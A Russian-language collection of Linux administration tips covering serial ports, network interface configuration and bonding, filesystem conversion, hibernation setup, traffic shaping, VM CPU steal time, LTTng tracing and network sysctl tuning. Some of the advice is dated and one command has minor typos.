Исправляем (ели нужно) в файле ``/etc/init.d/serial'' SETSERIAL="/sbin/setserial" на SETSERIAL="/bin/setserial" Конфигурация должна находиться в файле ``/etc/rc.d/config/serial'' Пример конфигурации: root # cat /etc/rc.d/config/serial #!/etc/init.d/serial # setup serial ports # setport(device, irq, port, args) setports() { setport ttyS2 19 0xa400 "baud_base 9600" setport ttyS3 19 0xa000 "baud_base 115200" setport ttyS4 18 0xbc00 "baud_base 115200" setport ttyS5 19 0xb800 "baud_base 115200" }

Примеры сетевых настроек в Linux дистрибутивах c /etc/sysconfig [комментарии]

Список опций: /usr/share/doc/initscripts* и /usr/share/doc/net-scripts* Алиасы: /etc/sysconfig/network-scripts/ifcfg-eth0:1 DEVICE=eth0:1 BOOTPROTO=static IPADDR=192.168.1.1 NETMASK=255.255.255.0 ONBOOT=yes Множественное задание алиасов: /etc/sysconfig/network-scripts/ifcfg-eth0-range0 DEVICE=eth0:1-10 BOOTPROTO=static IPADDR_START=192.168.10.100 IPADDR_END=192.168.10.110 CLONENUM_START=0 NETMASK=255.255.255.0 ONBOOT=yes или /etc/sysconfig/network-scripts/ifcfg-eth0:0: IPADDR=192.168.1.1-10 Вланы: /etc/sysconfig/vlan DOT1Q_VLANS=yes VLAN_NAMING=VLAN_PLUS_VID /etc/sysconfig/network-scripts/ifcfg-vlan0002 DEVICE=vlan0002 VLAN_TRUNK_IF=eth0 BOOTPROTO=static IPADDR=192.168.1.1 NETMASK=255.255.255.252 ONBOOT=yes IP туннель: /etc/sysconfig/network-scripts/ifcfg-iptun0 DEVICE=iptun0 TUNLOCAL=172.16.0.2 TUNREMOTE=172.16.0.1 PHYSLOCAL=192.168.1.1 PHYSREMOTE=192.196.2.1 TTL=16 TYPE=ipip # можно gre ONBOOT=yes IPSec: /etc/sysconfig/network-scripts/ifcfg-ipsectun0 DEVICE=ipsectun0 TUNLOCAL=10.0.0.1 TUNREMOTE=10.0.0.2 PHYSLOCAL=192.168.0.1 PHYSREMOTE=192.168.0.2 SPI=0x1000 # Each tunnel must have CIPHER and/or DIGEST. # Basedir for CIPHERFILE and DIGESTFILE is /etc/ipsec. CIPHER=3des-cbc CIPHERFILE=random-3des.key DIGEST=md5 DIGESTFILE=random-md5.key ONBOOT=no

Объединение сетевых интерфейсов под Linux (доп. ссылка 1) [комментарии]

Превращение двух 100 мбит/c сетевых карт в одну виртуальную, с пропускной способностью 200 мбит/c. Документация: Documentation/networking/bonding.txt в дереве исходных текстов ядра и "modinfo bonding". Кратко: Подгружаем модуль ядра "bonding", в /etc/modules.conf указываем alias bond0 bonding При желании устанавливаем опции для доп. настройки модуля, например: options bond0 mode=2, где mode= 0 - balance-rr (Round-robin выбор интерфейса) 1 - active-backup (работает только один интерфейс, остальные в режиме горячей замены) 2 - balance-xor - для всех пересылок на MAC закрепляется один из интерфейсов 3 - broadcast - трафик идет через оба интерфейса одновременно 4 - 802.3ad - для коммутаторов с поддержкой IEEE 802.3ad Dynamic link aggregation 5 - balance-tlb, 6 - balance-alb /sbin/ifconfig bond0 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255 up /sbin/ifenslave bond0 eth0 /sbin/ifenslave bond0 eth1 Или для дистрибутивов в которых используется пакет initscripts (http://rhlinux.redhat.com/initscripts/): /etc/sysconfig/network-scripts/ifcfg-bond0 DEVICE=bond0 BOOTPROTO=static BROADCAST=192.168.63.255 IPADDR=192.168.1.1 NETMASK=255.255.255.0 NETWORK=192.168.0.0 ONBOOT=yes /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 BOOTPROTO=static ONBOOT=yes MASTER=bond0 SLAVE=yes USERCTL=no /etc/sysconfig/network-scripts/ifcfg-eth1 DEVICE=eth1 BOOTPROTO=static ONBOOT=yes MASTER=bond0 SLAVE=yes USERCTL=no

Как посмотреть какой процесс открыл слишком много файлов под Linux [комментарии]

find /proc -name fd -type d -exec sh -c "echo \`ls {}|wc -l\` {}" \;|sort -n -r|head или использовать утилиту lsof

Как, после сборки ядра Linux, инициализировать initrd (ядро падает при монтировании root раздела) (доп. ссылка 1) Автор: as [комментарии]

initrd - RAM-диск, инициализируемый загрузчиком, требуется для подключения модулей ядра, необходимых на этапе до монтирования root-раздела, (например, до монтирования нужно подгрузить - ext2/ext3/scsi модули). 1) man initrd - все изумительно описано; 2) после сборки ядра создаем новый initrd: mkinitrd /boot/initrd-2.4.21 2.4.21; 3) в /etc/lilo.conf: initrd=/boot/initrd-2.4.21 В mkinitrd сам initrd можно назвать как угодно, но второй параметр обязательно версия ядра.

Как в Linux после kernel panic вместо ожидания действия оператора автоматически выполнять перезагрузку. [комментарии]

Добавьте в /etc/rc.d/rc.local: echo 1 > /proc/sys/kernel/panic Т.е. перезагрузка будет выполнена через 1 сек. после panic, если 0 - то не перезагружать а ждать.

Почему Linux ядро не использует всю память и пишет "Warning only 960MB will be used". [комментарии]

Если добавление в lilo append="mem=1536M" не помогает: Необходимо пересобрать 2.2.x ядро с опцией CONFIG_2GB=y Processor type and features -> Maximum Physical Memory -> 2Gb Если проблема проявляется в ядре 2.4.x - CONFIG_HIGHMEM, CONFIG_HIGHMEM4G или CONFIG_HIGHMEM64G

Ограничения трафика с помощью iproute2 (доп. ссылка 1) Автор: Z0termaNN [комментарии]

tc qdisc add dev eth1 root handle 1: htb default 2 r2q 1 tc class add dev eth1 parent 1: classid 1:1 htb rate 10mbit ceil 10mbit mtu 1500 tc class add dev eth1 parent 1:1 classid 1:77 htb rate 32kbit ceil 48kbit mtu 1500 prio 0 tc class add dev eth1 parent 1:1 classid 1:2 htb rate 128kbit ceil 128kbit mtu 1500 tc filter add dev eth1 protocol ip parent 1:0 prio 1 u32 match ip dport 25 flowid 1:77

Переход на журналируемую файловую систему Reiserfs [комментарии]

- Включаем поддержку Reiserfs в ядре. - Устанавливаем reiserfsprogs-3.x.0j.tar.gz - Cоздаем бут дискету (mkbootdisk --device /dev/fd0 2.4.13; lilo -C /etc/lilo.flop) - Грузимся с дискеты указав в Lilo приглашении "linux root=/dev/hd init=/bin/bash" - mkreiserfs /dev/hda1 - mount -t reiserfs /dev/had1 /

Как под Linux установить параметры serial порта (прерывание, адрес порта) [обсудить]

/bin/setserial -b /dev/ttyS2 uart 16450 port 0x2E8 irq 5

Как через poweroff обеспечить выключение системного блока Автор: Alexander [обсудить]

Если при наборе /sbin/poweroff отключение питания не срабатывает, то: /sbin/modprobe ospm_busmgr /sbin/modprobe ospm_system или в /etc/modules.conf: alias ospm-busmgr ospm_busmgr alias ospm-busmgr ospm_system

Как посмотреть параметры и возможные опции для модуля ядра Linux [обсудить]

Информация о авторе. modinfo -a модуль Описание модуля. modinfo -d модуль Список возможных параметров. modinfo -p модуль

Как в Linux выставить принудительно 100Mb FullDuplex для Intel EtherExpress Pro100, а то auto-select с некоторыми свичами не работает. (доп. ссылка 1) [обсудить]

/sbin/mii-tool -F 100baseTx-FD eth0 или ethtool -s eth0 speed 100 duplex full autoneg off Для модуля: В /etc/modules.conf: options eepro100 options=0x200 full_duplex=1 alias eth0 eepro100 insmod eepro100.o debug=1 options=0x200 Для ядра в boot приглашении: ether=0,0,0x200,eth0 PS. Для драйвера версии меньше 1.14 (mod_info -a eepro100) вместо 0x200 следует писать 0x30.

Как перейти в Linux на файловую систему ext3 (доп. ссылка 1) [комментарии]

Выкачиваем и накладываем ext3 патчи (ftp://ftp.kernel.org/pub/linux/kernel/people/sct/ext3/) и утилиты (ftp://download.sourceforge.net/pub/sourceforge/e2fsprogs/). Преобразуем ext2 FS в ext3 (для отмонтированного раздела hda1): tune2fs -j /dev/hda1 Обратное преобразование (из ext3 в ext2): tune2fs -O ^has_journal /dev/hda1 fsck.ext2 -f /dev/hdaX Для форматирование нового ext3 раздела: mke2fs -j /dev/hda1 Как обновить версию журнала: mount /dev/hdaX /mnt -o journal=update

Как посмотреть установки конфигурации для бинарного ядра Linux [обсудить]

Если ядро было собрано с опцией CONFIG_PROC_CONFIG=Y: zcat /proc/config.gz

Активация режима гибернации в KDE neon Автор: popov895 [комментарии]

Алгоритм почти такой же, как и для openSUSE, но небольшие отличия все-таки есть. Итак, создаём файл подкачки. Я решил разместить его в каталоге /var/lib/swap. Создаём каталог и закрываем к нему доступ всем, кроме root: sudo mkdir -p /var/lib/swap sudo chmod 700 /var/lib/swap Создаём файл, который будет использоваться как файл подкачки (у меня он будет размером 11 Гб), и закрываем к нему доступ всем, кроме root: sudo fallocate -l 11G /var/lib/swap/swapfile sudo chmod 600 /var/lib/swap/swapfile Настраиваем и активируем файл подкачки: sudo mkswap /var/lib/swap/swapfile sudo swapon /var/lib/swap/swapfile Чтобы файл подкачки автоматически монтировался во время загрузки, необходимо прописать его в /etc/fstab. Не забываем делать резервные копии системных файлов, которые планируем редактировать!: /var/lib/swap/swapfile none swap defaults 0 0 Далее нам нужно указать в grub, откуда система должна загружать данные после выхода из режима гибернации. Нам нужно узнать: 1. ID раздела, на котором находится файл подкачки 2. физическое смещение файла подкачки на этом разделе. ID раздела мы можем найти в том же /etc/fstab. У меня этот ID равен b92afe00-6cc9-4231-a03e-282bc6a560ef: cat /etc/fstab UUID=b92afe00-6cc9-4231-a03e-282bc6a560ef / ext4 defaults 0 1 Смещение находим с помощью команды swap-offset, у меня это значение равно 317440: sudo swap-offset /var/lib/swap/swapfile resume offset = 317440 Записываем полученные данные в файл /etc/default/grub. Находим параметр GRUB_CMDLINE_LINUX_DEFAULT и добавляем к нему запись вида resume=UUID=<UUID> resume_offset=<offset>. У меня это выглядит так: GRUB_CMDLINE_LINUX_DEFAULT="splash=silent mitigations=auto quiet resume=UUID=b92afe00-6cc9-4231-a03e-282bc6a560ef resume_offset=317440" Далее необходимо обновить файл конфигурации grub: sudo update-grub Гибернация уже должна работать, это можно проверить с помощью команды systemctl hibernate. Единственное, чего нам не хватает - возможности перехода в режим гибернации из пользовательского интерфейса. Чтобы это исправить, нам нужно создать файл /etc/polkit-1/localauthority/50-local.d/99-hibernate.pkla с таким содержимым: [Enable hibernate in upower] Identity=unix-user:* Action=org.freedesktop.upower.hibernate ResultActive=yes [Enable hibernate in logind] Identity=unix-user:* Action=org.freedesktop.login1.hibernate;org.freedesktop.login1.handle-hibernate-key;org.freedesktop.login1;org.freedesktop.login1.hibernate-multiple-sessions;org.freedesktop.login1.hibernate-ignore-inhibit ResultActive=yes Перезагружаемся и проверяем работу режима гибернации.

Активация режима гибернации в openSUSE Tumbleweed Автор: popov895 [комментарии]

Имеется установленная openSUSE Tumbleweed с KDE, на разделах в качестве файловой системы используется ext4. Чтобы иметь возможность использовать гибернацию, необходимо иметь раздел подкачки или файл подкачки. Я предпочитаю использовать файл подкачки, потому что в любое время можно легко изменить его размер или вовсе его удалить, С разделом же придется повозится. Я буду использовать файл подкачки. В случае с btrfs следует использовать раздел подкачки. Итак, создаём файл подкачки. Чтобы он не мозолил глаза, я решил разместить его в каталоге /var/lib/swap. Создаём каталог: sudo mkdir -p /var/lib/swap Закрываем к нему доступ всем, кроме root: sudo chmod 700 /var/lib/swap Чтобы выбрать оптимальный размер файла подкачки, я воспользовался таблицей. Для себя я выбрал размер 11 Гб (11534336 байт). Создаем файл, который будет использоваться как файл подкачки: sudo dd if=/dev/zero of=/var/lib/swap/swapfile bs=1024 count=11534336 Закрываем к нему доступ всем, кроме root: sudo chmod 600 /var/lib/swap/swapfile Настраиваем файл подкачки: sudo mkswap /var/lib/swap/swapfile Активируем файл подкачки: sudo swapon /var/lib/swap/swapfile Уже после этих действий должен появится пункт перехода в режим гибернации, но сама режим пока что работать не будет. Чтобы файл подкачки автоматически монтировался во время загрузки, необходимо прописать его в /etc/fstab. Не забываем делать резервные копии системных файлов, которые планируем редактировать!: /var/lib/swap/swapfile none swap defaults 0 0 Далее нам нужно указать в grub, откуда система должна загружать данные после выхода из режима гибернации. Нам нужно узнать: 1. ID раздела, на котором находится файл подкачки 2. физическое смещение файла подкачки на этом разделе. ID раздела мы можем найти в том же /etc/fstab. У меня этот ID равен f68ed3c5-da10-4288-890f-b83d8763e85e: cat /etc/fstab UUID=4e73657c-f1d2-4f52-9909-1226a6fe6493 / ext4 defaults 0 1 Смещение находим с помощью команды filefrag. Значением смещения является левое верхнее число столбца physical_offset в двумя горизонтальными точками (..) в конце. У меня это значение равно 337920: sudo filefrag -v /var/lib/swap/swapfile File size of /var/lib/swap/swapfile is 11811160064 (2883584 blocks of 4096 bytes) ext: logical_offset: physical_offset: length: expected: flags: 0: 0.. 14335: 337920.. 352255: 14336: 1: 14336.. 20479: 378880.. 385023: 6144: 352256: 2: 20480.. 22527: 387072.. 389119: 2048: 385024: ... Записываем полученные данные в файл /etc/default/grub. Находим параметр GRUB_CMDLINE_LINUX_DEFAULT и добавляем к нему запись вида resume=UUID=<UUID> resume_offset=<offset>. У меня это выглядит так: GRUB_CMDLINE_LINUX_DEFAULT="splash=silent mitigations=auto quiet resume=UUID=4e73657c-f1d2-4f52-9909-1226a6fe6493 resume_offset=337920" Далее необходимо обновить файл конфигурации grub: sudo grub2-mkconfig -o /boot/grub2/grub.cfg или для EFI: sudo grub2-mkconfig -o /boot/efi/EFI/opensuse/grub.cfg И последнее, что нам нужно сделать - пересобрать initramfs с поддержкой модуля resume. Для этого создаём файл /etc/dracut.conf.d/99-resume.conf с таким содержимым: add_dracutmodules+=resume И, собственно, пересобираем initramfs: sudo dracut -fv Перезагружаемся и проверяем работу режима гибернации.

Откуда берется steal внутри виртуальных машин и что с этим делать (доп. ссылка 1) Автор: Mail.Ru Cloud Solutions [комментарии]

CPU steal time - это время, в течение которого виртуальная машина не получает ресурсы процессора для своего выполнения. Это время считается только в гостевых операционных системах в средах виртуализации. Что такое steal Steal - это метрика, указывающая на нехватку процессорного времени для процессов внутри виртуальной машины. Как описано в патче ядра KVM, steal - это время, в течение которого гипервизор выполняет другие процессы на хостовой операционной системе, хотя он поставил процесс виртуальной машины в очередь на выполнение. То есть steal считается как разница между временем, когда процесс готов выполниться, и временем, когда процессу выделено процессорное время. Метрику steal ядро виртуальной машины получает от гипервизора. При этом гипервизор не уточняет, какие именно другие процессы он выполняет, просто "пока занят, тебе времени уделить не могу". На KVM поддержка подсчёта steal добавлена в патчах. Ключевых моментов здесь два: 1. Виртуальная машина узнает о steal от гипервизора. То есть, с точки зрения потерь, для процессов на самой виртуалке это непрямое измерение, которое может быть подвержено различным искажениям. 2. Гипервизор не делится с виртуалкой информацией о том, чем он занят - главное, что он не уделяет время ей. Из-за этого сама виртуалка не может выявить искажения в показателе steal, которые можно было бы оценить по характеру конкурирующих процессов. Как вычислить steal По сути, steal считается как обычное время утилизации процессора. В ядре добавляется ещё один счетчик непосредственно для процесса KVM (процесса виртуальной машины), который считает длительность пребывания процесса KVM в состоянии ожидания процессорного времени. Счетчик берет информацию о процессоре из его спецификации и смотрит, все ли его тики утилизированы процессом виртуалки. Если все, то считаем, что процессор занимался только процессом виртуальной машины. В ином случае информируем, что процессор занимался чем-то еще, появился steal. Подробнее читайте в статье Brendann Gregg. Как мониторить steal Мониторить steal внутри виртуальной машины можно как любую другую процессорную метрику. Главное, чтобы виртуалка была на Linux. Windows такую информацию не предоставляет. Сложность возникает при попытке получить эту информацию с гипервизора. Можно попробовать спрогнозировать steal на хостовой машине, например, по параметру Load Average (LA) - усредненного значения количества процессов, ожидающих в очереди на выполнение. Методика подсчета этого параметра непростая, но в целом пронормированный по количеству потоков процессора LA > 1 указывает на перегрузку Linux-сервера. Чего же ждут все эти процессы? Очевидный ответ - процессора. Но иногда процессор свободен, а LA зашкаливает. На самом деле, процессы могут ожидать окончания любой блокировки, как физической, связанной с устройством ввода/вывода, так и логической, например мьютекса. Туда же относятся блокировки на уровне железа (того же ответа от диска) или логики (так называемых блокировочных примитивов). Ещё одна особенность LA в том, что оно считается как среднее значение по ОС, причём не меньше, чем за минуту. Например, 100 процессов конкурируют за один файл, тогда LA=50. Такое большое значение, казалось бы, говорит, что ОС плохо. Но для криво написанного кода это может быть нормой - плохо только ему, а другие процессы не страдают. Из-за этого усреднения (причём не меньше, чем за минуту), определение чего-либо по LA может закончиться весьма неопределенными результатами в конкретных случаях. Почему появляется steal и что делать Остановимся на основных причинах появления steal, с которыми мы столкнулись при работе с облачной платформой MCS, и способах борьбы с ними. Переутилизация. Самое простое и частое - много запущенных виртуальных машин, большое потребление процессора внутри них, большая конкуренция, утилизация по LA больше 1 (в нормировке по процессорным тредам). Внутри всех виртуалок всё тормозит. Steal, передаваемый с гипервизора, также растёт, надо перераспределять нагрузку или кого-то выключать. При этом нужно учитывать, что соотношение нагрузки на гипервизоре и steal внутри виртуальной машины не всегда однозначно взаимосвязаны. Обе оценки steal могут быть ошибочными в конкретных ситуациях при разных нагрузках. Паравиртуализация против одиноких инстансов. На гипервизоре одна единственная виртуалка, она потребляет небольшую его часть, но дает большую нагрузку по вводу/выводу, например по диску. И откуда-то в ней появляется небольшой steal, до 10%. Тут дело как раз в блокировках на уровне паравиртуализированных драйверов. Внутри виртуалки создается прерывание, оно обрабатывается драйвером и уходит в гипервизор. Из-за обработки прерывания на гипервизоре для виртуалки это выглядит как отправленный запрос, она готова к исполнению и ждёт процессора, но процессорного времени ей не дают. Виртуалка думает, что это время украдено. Это происходит в момент отправки буфера, он уходит в kernel space гипервизора, и мы начинаем его ждать. Хотя, с точки зрения виртуалки, он должен сразу вернуться. Следовательно, по алгоритму расчета steal это время считается украденным. Скорее всего, в этой ситуации могут быть и другие механизмы (например, обработка ещё каких-нибудь sys calls), но они не должны сильно отличаться. Небольшой steal можно считать нормой (даже и без паравиртуализации, с учётом нагрузки внутри виртуалки, особенностей нагрузки соседей, распределения нагрузки по тредам и прочего). Однако важно обращать внимание на то, как себя чувствуют приложения внутри виртуалок. Шедулер против высоконагруженных виртуалок. Когда одна виртуалка страдает от steal больше других, это связано с шедулером (распределением ресурсов между процессами) - чем сильнее процесс нагружает процессор, тем скорее шедулер его выгонит, чтобы остальные тоже могли поработать. Если виртуалка потребляет немного, она почти не увидит steal: её процесс честно сидел и ждал, ему дадут время. Если виртуалка дает максимальную нагрузку по всем своим ядрам, её чаще выгоняют с процессора и не дают много времени. Шедулер плохо относится к процессам, которые много просят. Большие виртуалки - зло. Низкий LA, но есть steal. LA примерно 0,7 (то есть, гипервизор, кажется недозагружен), но внутри отдельных виртуалок наблюдается steal: 1. Уже описанный выше вариант с паравиртуализацией. Виртуалка может получать метрики, указывающие на steal, хотя у гипервизора всё хорошо. По результатам наших экспериментов, такой вариант steal не превышает 10 % и не должен оказывать существенного влияния на производительность приложений внутри виртуалки. 2. Неверно считается LA. Точнее, в каждый конкретный момент он считается верно, но при усреднении получается заниженным. Например, если одна виртуалка на треть гипервизора потребляет все свои процессоры ровно полминуты, LA за минуту на гипервизоре будет 0,15; четыре такие виртуалки, работающие одновременно, дадут 0,6. А то, что полминуты на каждой из них был steal под 25 % по LA, уже не вытащить. 3. Из-за шедулера, решившего, что кто-то слишком много ест, и пусть он подождет, пока я займусь другими важными системными вещами. В итоге одни виртуалки не видят никаких проблем, а другие испытывают серьезную деградацию производительности. Другие искажения Есть другие причины для искажений честной отдачи процессорного времени на виртуалке. Например, сложности в расчёты вносят гипертрединг и NUMA. Они запутывают выбор ядра для исполнения процесса, потому что шедулер использует коэффициенты - веса, которые при переключении контекста выполняют усложнённый подсчёт. Бывают искажения из-за технологий типа турбобуста или, наоборот, режима энергосбережения, которые при подсчёте утилизации могут искусственно повышать или понижать частоту или даже квант времени на сервере. Включение турбобуста уменьшает производительность одного процессорного треда из-за увеличения производительности другого. В этот момент информация об актуальной частоте процессора виртуальной машине не передается, и она считает, что её время кто-то тырит (например, она запрашивала 2 ГГц, а получила вдвое меньше). В общем, причин искажений может быть много. Чтобы выяснить steal в конкретной системе, исследуйте различные варианты, собирайте метрики, тщательно их анализируйте и продумывайте, как равномерно распределять нагрузку. От любых кейсов возможны отклонения, которые надо подтверждать экспериментально или смотреть в отладчике ядра. Начать лучше с книг, на которые я дал линки выше, и съёма статистики с гипервизора утилитами типа perf, sysdig, systemtap, коих десятки.

Как изменить параметры последовательного порта в Linux (доп. ссылка 1) [комментарии]

Вывод на экран текущих параметров: stty -F /dev/ttyS0 -a setserial -g /dev/ttyS0 Включение Hardware flow control (RTS/CTS): stty -F /dev/ttyS0 crtscts Установка скорости порта: stty -F /dev/ttyS0 9600 Установка прерывания и типа UART: setserial /dev/ttyS0 auto_irq skip_test autoconfig setserial /dev/ttyS0 irq 5 uart 16550A skip_test

Как узнать подробную информацию о EX2FS, размер блоков, системные данные и т.д. [обсудить]

общие данные из суперблока - dumpe2fs -h /dev/раздел информацию о каждом блоке - dumpe2fs /dev/раздел Для FreeBSD нужно использовать dumpfs.

Оптимизация и тюнинг в Linux

Использование LTTng для прозрачной трассировки приложений в Ubuntu Linux (доп. ссылка 1) [комментарии]

Система трассировки LTTng (http://lttng.org/) работает на уровне Linux-ядра и отличается минимальным влиянием на работу профилируемого приложения, что позволяет приблизить условия работы данного приложения к его выполнению без использования трассировки (например, позволяет выявлять проблемы с производительностью в программах, работающих в реальном режиме времени). Поддержка LTTng пока не включена в состав Linux-ядра, но недавно для Ubuntu Linux был подготовлен специальный PPA-репозиторий, позволяющий значительно упростить установку LTTng. Приведем пример использования LTTng для отладки системы и тюнинга производительности. Подключаем репозиторий: sudo add-apt-repository ppa:lttng/ppa sudo aptitude update Устанавливаем компоненты для трассировки ядра (LTTng работает только с ядром 2.6.35, поэтому в Ubuntu 10.04 может потребоваться установка экспериментального пакета с более новым ядром): sudo apt-get install lttng Установка утилит для трассировки пользовательских приложений: sudo apt-get install ust-bin libust-dev liburcu-dev Пример поддержи трассировки на уровне ядра Загружаем ядро lttng: sudo ltt-armall Начинаем трассировку: sudo lttctl -C -w /tmp/trace1 программа Прекращаем трассировку: sudo lttctl -D программа Результаты трассировки /tmp/trace1 теперь можно открыть в утилите lttv или использовать режим текстового дампа: lttv -m textDump -t /tmp/trace1 | grep ... Трассировка пользовательских приложений со связыванием специальной библиотеки Собираем приложения добавив в опции сборки флаг '-lust'. Запускаем приложение с трассировкой: usttrace исследуемая_программа Контроль трассировки с удаленной машины На локальной машине устанавливаем и запускаем программу-агент: sudo apt-get install tcf-lttng-agent sudo tcf-agent На удаленной машине устанавливаем и запускаем клиента: sudo apt-get install tcf-lttng-client tcf-client далее, в появившейся консоли вводим: connect ip_локальной_машины и после соединения передаем управляющие команды: tcf ltt_control getProviders tcf ltt_control setupTrace "kernel" "0" "traceTest" Пример трассировки Рассмотрим для примера простую программу, открывающую файл и записывающую в него циклично числа. #include <stdio.h> #define INT_MAX 2147483647 int main(volatile int argc, char **argv) { int i = 3; FILE *fd = fopen("test.out", "w"); fwrite(&i, sizeof(int), 1, fd); fclose(fd); volatile long a; int x; for (x = 0; x<INT_MAX; x++) { a++; } return 0; } Собираем данную программу: gcc -o usecase usecase.c Теперь попробуем выполнить трассировку при помощи LTTng. Активируем точки трассировки в ядре: sudo ltt-armall Для автоматизации выполнения активации трассировки, запуска программы и остановки трассировки напишем небольшой скрипт trace-cmd.sh: #!/bin/sh if [ -z "$@" ]; then echo "missing command argument" exit 1 fi cmd="$@" name="cmd" dir="$(pwd)/trace-$name" sudo rm -rf $dir sudo lttctl -o channel.all.bufnum=8 -C -w $dir $name echo "executing $cmd..." $cmd echo "return code: $?" sudo lttctl -D $name Запускаем: ./trace-cmd.sh ./usecase После выполнения трассировки для наглядного анализа результатов запускаем GUI-утилиту lttv-gui, заходим в меню File->Add и выбираем директорию трассировки "trace-имя", сохраненную в каталоге, в котором был запущен скрипт trace-cmd.sh. Каждое из событий трассировки представлено в виде графика. Для нашего тестового приложения будет присутствовать три фазы: создание/доступ к файлу, вычислительная фаза и завершение процесса. Оценка различий от strace Если сравнить результаты работы стандартной утилиты strace: strace -o usecase.strace ./usecase В дополнение к системным вызовам, LTTng учитывает задействование подсистем ядра, события планировщика задач, обработку прерываний и прочие детали, недоступные в выводе strace. Но самым интересным отличием от strace является то, что программа никаким образом не может определить, что подвергается трассировке. Время наступления событий отображается в наносекундах. Влияние на производительность трассировки минимально, тестирование показало, что работа замедляется не более чем на 3%.

Часто используемые параметры sysctl, касающиеся настройки сети в Linux (доп. ссылка 1) Автор: zersh [комментарии]

От переводчика (@zersh). Это адаптированный перевод работы https://github.com/leandromoreira/linux-network-performance-parameters Для понимания некоторых моментов использовалась статья. Принимаются любые замечания и предложения. Спасибо zizmo и @servers(Artem) - за помощь и конструктивную критику) Лицензия: BSD-3 Введение Иногда люди пытаются найти некие универсальные значения параметров sysctl (https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt), применение которых во всех случаях позволит добиться и высокой пропускной способности, и низкой задержки при обработке сетевых запросов. К сожалению, это не возможно, хотя стоит отметить, что современные версии ядер по умолчанию уже неплохо настроены. Важно понимать, что изменение заданных по умолчанию настроек может ухудшить производительность (https://medium.com/@duhroach/the-bandwidth-delay-problem-c6a2a578b211). Это краткое руководство, в котором приведены часто используемые параметры sysctl, касающиеся настройки сети Linux, вдохновлённый иллюстрированным руководством по сетевому стеку Linux (https://blog.packagecloud.io/eng/2016/10/11/monitoring-tuning-linux-networking-stack-receiving-data-illustrated/) и многими постами Marek Majkowski (https://blog.cloudflare.com/how-to-achieve-low-latency/). Обзор сетевых очередей Linux Связь переменных sysctl с различными стадиями обработки сетевых потоков в Linux Входящие пакеты (Ingress) 1. Пакеты прибывают в NIC (сетевой адаптер) 2. NIC проверяет `MAC` (если не включён promiscuous-режим) и `FCS (Frame check sequence)` и принимает решение отбросить пакет или продолжить обработку. 3. NIC используя DMA (https://en.wikipedia.org/wiki/Direct_memory_access), помещает пакеты в RAM регионе, ранее подготовленном (mapped) драйвером. 4. NIC ставит ссылки в очередь на пакеты при получении ring buffer (https://en.wikipedia.org/wiki/Circular_buffer) очередь `rx` до истечения таймаута `rx-usecs` или `rx-frames` 5. NIC Генерируется аппаратное прерывание, чтобы система узнала о появлении пакета в памяти `hard IRQ` 6. CPU запустит `IRQ handler`, который запускает код драйвера 7. Драйвер вызовет `планировщик NAPI`, очистит `hard IRQ` 8. Драйвер будит подсистему NAPI с помощью `soft IRQ (NET_RX_SOFTIRQ)` 9. NAPI опрашивает данные, полученные из кольцевого буфера до тех пор пока не истечёт таймаут `netdev_budget_usecs`, или `netdev_budget` и `dev_weight` пакета 10. Linux также выделяет память для `sk_buff` 11. Linux заполняет метаданные: протокол, интерфейс, устанавливает MAC-адрес (setmacheader), удаляет ethernet 12. Linux передаёт skb (данные) в стэк ядра (`netif_receive_skb`) 13. Установит сетевые заголовки, клонирует `skb` ловушкам (вроде tcpdump) и передаст на вход 14. Пакеты обрабатываются в qdisc (Queueing discipline) размера `netdev_max_backlog`, алгоритм которого определяется `default_qdisc` 15. Вызывает `ip_rcv` и пакеты обрабатываются в IP 16. Вызывает netfilter (`PREROUTING`) 17. Проверяет маршрутизацию, кому предназначен пакет: переслать (forwarding) или локально (local) 18. Если локально, вызывает netfilter (`LOCAL_IN`) 19. Это вызовет протокол L4 (для примера `tcp_v4_rcv`) 20. Находит нужный сокет 21. Переходит на конечный автомат tcp (finite state machine). 22. Поставит пакет в входящий буфер, размер которого определяется правилами `tcp_rmem`. Если `tcp_moderate_rcvbuf` включён, ядро будет автоматически тюнить буфер приёма (receive) 23. Ядро сигнализирует приложению, что доступны данные (epoll или другая polling-система) 24. Приложение просыпается и читает данные Исходящие пакеты (Egress) 1. Приложение отправляет сообщение (`sendmsg` или другие) 2. TCP-стек выделяет память для skb_buff 3. Помещает skb в сокет буфера, размером `tcp_wmem` 4. Создаст TCP заголовки (источник и порт назначения, контрольная сумма) 5. Вызывает обработчик L3 (в данном случае `ipv4` в `tcp_write_xmit` и `tcp_transmit_skb`) 6. L3 (`ip_queue_xmit`) построит заголовок IP и вызовет netfilter (`LOCAL_OUT`) 7. Вызывает действие выходного маршрута (Calls output route action) 8. Вызывает netfilter (`POST_ROUTING`) 9. Фрагментирует пакет (`ip_output`) 10. Вызывает функции отправки L2 (`dev_queue_xmit`) 11. Подаёт на выход (QDisc) очередь длинной `txqueuelen` с алгоритмом `default_qdisc` 12. Код драйвера помещает пакеты в `ring buffer tx` 13. Драйвер генерирует `soft IRQ (NET_TX_SOFTIRQ)` после `tx-usecs` таймаута или `tx-frames` 14. Реактивирует аппаратное прерывание (IRQ) в NIC 15. Драйвер отражает (map) все пакеты (для отправки) в некоторую область DMA 16. NIC получит пакеты (через DMA) из RAM для передачи 17. После передачи NIC поднимет сигнал `hard IRQ` о его завершении 18. Драйвер обработает это прерывание IRQ (выключает) 19. И планирует (`soft IRQ`) NAPI poll system 20. NAPI будет обрабатывать сигналы приёма пакетов и освобождать ОЗУ Для отслеживания обработки событий, связанных с выполнением сетевой операции, можно использовать команду: perf trace --no-syscalls --event 'net:*' ping globo.com -c1 > /dev/null Что, Почему и Как - сеть и sysctl параметры Кольцевой буфер (Ring Buffer) - rx, tx Что: драйвер очереди приёма/отправки одной или нескольких очередей с фиксированным размером, обычно реализованный как FIFO, находится в ОЗУ Почему: буфер для плавного прима соединений без их отбрасывания. Возможно, вам понадобится увеличить эти очереди, когда вы увидите сбросы (drops) или переполнения, то есть, если поступает больше пакетов, чем ядро может обработать. Побочным эффектом от увеличения буфера может стать увеличение задержки. Как: Команда проверки: ethtool -g ethX Как изменить: ethtool -G ethX rx значение tx значение Как мониторить: ethtool -S ethX | grep -e "err" -e "drop" -e "over" -e "miss" -e "timeout" -e "reset" -e "restar" -e "collis" -e "over" | grep -v "\: 0" Слияние прерываний (Interrupt Coalescence - IC) - rx-usecs, tx-usecs, rx-frames, tx-frames (аппаратные IRQ) Что: количество микросекунд / кадров, ожидающих перед поднятием hard IRQ, с точки зрения сетевого адаптера это будет пакеты данных 